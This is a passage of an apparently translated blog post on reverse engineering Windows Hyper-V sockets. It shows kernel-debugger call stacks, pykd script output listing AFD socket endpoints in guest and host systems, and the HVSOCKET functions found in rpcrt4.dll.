<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 NETIO!NmrClientAttachProvider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 afd!AfdTlNotifyAttachProvider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 NETIO!NmrpProposeAttachment</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 NETIO!NmrpAttachArray</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 NETIO!NmrpRegisterModule</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 NETIO!NmrRegisterProvider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 hvsocket!HvSocketProviderStart</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbusr!RootDeviceAdd</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In hvsocket!HvSocketProviderStart occurs a call of next functions:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">netio!NetioInitializeWorkQueue</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">netio!NmrRegisterProvider</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket.sys – NPI-провайдер</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the hvsocket.sys driver was added for checks to </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">netio!NmrpVerifyModule</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (in compare with early mentioned wasm article, which describe 3 module)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RtlInitString(&strAfd, "\\systemroot\\system32\\drivers\\afd.sys");</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RtlInitString(&strTdx, "\\systemroot\\system32\\drivers\\tdx.sys");</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RtlInitString(&strTcpip, "\\systemroot\\system32\\drivers\\tcpip.sys");</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RtlInitString(&strHvsocket, "\\systemroot\\system32\\drivers\\hvsocket.sys");</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Script afd_parse_AfdEndpointListHead_pykd.py can get the list of the objects created when opening each socket. If the socket is closed, then an object disappears from the list. The script, in principle, displays the same, as the utility of tcpconnect from Sysinternals Suite (but it, unfortunately, does not display opened Hyper-V sockets) or </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://codemachine.com/article_findafdendpoints.html</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> script</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, with an additional conclusion of the driver name and the procedure processing operations with a socket and also a name of process and PID.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For example, there is contents of lists in guest and root OS after successful execution of a Enter-PSSession cmdlet:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !py C:\Tools\Scripts\afd_parse_AfdEndpointListHead_pykd.py – в гостевой ОС</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdEndpointListHead address is 0xfffff80490ef74e0L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xfffff80490ef74e0L 0xda10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d64e7c130L 0xafd2 tcpip!TcpTlProviderEndpointDispatch explorer.exe 0x3c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d6421af60L 0xafd2 hvsocket!VmbusTlProviderEndpointDispatch powershell.exe 0x920</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d64846ea0L 0xafd4 hvsocket!VmbusTlProviderListenDispatch powershell.exe 0x920</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d64d082a0L 0xafd1 tcpip!UdpTlProviderEndpointDispatch lsass.exe 0x204</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d642b8960L 0xafd1 tcpip!UdpTlProviderEndpointDispatch lsass.exe 0x204</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d640c8ba0L 0xafd4 hvsocket!VmbusTlProviderListenDispatch svchost.exe 0x35c (в состав процесса входит служба vmicsession)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d650c3c30L 0xaafd 0 explorer.exe 0x3c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d64340f60L 0xaafd 0 explorer.exe 0x3c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">---------------------------------------------------------------------------------------------</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !py D:\ida_files\afd_parse_AfdEndpointListHead_pykd.py – в родительской ОС</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdEndpointListHead address is 0xfffff807668b74e0L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xfffff807668b74e0L 0xe4a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffff958f202eb300L 0xafd2 hvsocket!VmbusTlProviderEndpointDispatch powershell.exe 0xcc4L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffff958f21d7eac0L 0xafd1 tcpip!UdpTlProviderMessageDispatch svchost.exe 0x438L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffff958f207dd9e0L 0xafd2 hvsocket!VmbusTlProviderEndpointDispatch powershell_ise 0x394L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffff958f1fbc5f60L 0xafd1 tcpip!UdpTlProviderMessageDispatch svchost.exe 0x498L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">---------------------------------------------------------------------------------------------</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It interesting, we can see one more socket created by process of svchost.exe at early stages of operating system loading:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !py D:\ida_files\ParseAfdEndpointListHead.py</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">---------------------------------------------------------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd1851637e130L 0xafd0 tcpip!TcpTlProviderEndpointDispatch svchost.exe 0x410L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd1851627ed60L 0xafd0 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlProviderEndpointDispatch</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> svchost.exe 0x384L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd185161d7330L 0xafd0 tcpip!TcpTlProviderEndpointDispatch wininit.exe 0x2a4L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">---------------------------------------------------------------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This socket is created by the RPC service, namely the function! RPCRT4TransportProtocol::HandlePnPStateChange. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Stack:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> k – bp on wshhyperv.dll load</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13 mswsock!SockGetTdiName+0x2b1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 mswsock!SockSocket+0x117</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15 mswsock!WSPSocket+0x220</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16 WS2_32!WSASocketW+0x1f0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 RPCRT4!TransportProtocol::OpenAddressChangeRequestSocket+0x43</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 RPCRT4!TransportProtocol::VerifyProtocolIsFunctional+0x14</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 RPCRT4!TransportProtocol::HandleProtocolChange+0x100</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a RPCRT4!TransportProtocol::HandlePnPStateChange+0x72</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b RPCRT4!ProcessNewAddressEvent+0x21</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1c RPCRT4!COMMON_AddressChangeThreadPoolCallback+0x25</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d KERNELBASE!BasepTpIoCallback+0x50</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1e ntdll!TppIopExecuteCallback+0x118</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1f ntdll!TppWorkerThread+0x8ed</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">20 KERNEL32!BaseThreadInitThunk+0x14</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">21 ntdll!RtlUserThreadStart+0x21</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Function ws2_32!WSAEnumProtocols called from RPCRT4!TransportProtocol::HandlePnPStateChange. Works with rpcrt4!TransportProtocolArray based on result of ws2_32!WSAEnumProtocols. TransportProtocol::HandleProtocolChange called for each element of the table TransportProtocol (the second parameter - structure of WSAPROTOCOL_INFOW). The size of each TransportProtocolArray element - 72 bytes. But type of this socket - 0xafd0. The structure </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">_AFD_CONNECTION,</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> describes a condition of such socket, up to the end is not filled, and on offset +e0 from the beginning of structure there are only zero. To have a possibility of connection to Hyper-V sockets, its type has to be at least 0xafd2.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are many functions working with Hyper-V sockets in rpcrt4.dll symbols:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_QueryClientID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_BuildAddressVector</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_Open</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_QueryClientAddress</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_REsolveAddress</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_ResolveVmId</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_ServerListen</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HVSOCKET_SetSocketOption</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The purposes of addition of support in RPC library are unknown. According to MSDN PowerShell Direct has to work locally and actually it does not use RPC for the work.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="78" src="https://lh4.googleusercontent.com/6zGb91_7AH3LZkBf_aMiC_6KaYr6i3vx8AGaUH9rgXiHYfVsNK8NAwxIwYumMIc89awVkcRYT4clAJUPDh-21ibI4qHvOV2s7SrcCmyM_8QaXdiDUPxW6Dq_mhs8JX9aCOowpavhTxhumms4pQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="322" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Perhaps, these functions are necessary for work in the Docker environment, or for future support of distant work of PowerShell Direct.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><ol start="3" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: decimal; margin-left: -18pt; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hyper-V socket work</span></div>
</li>
</ol>
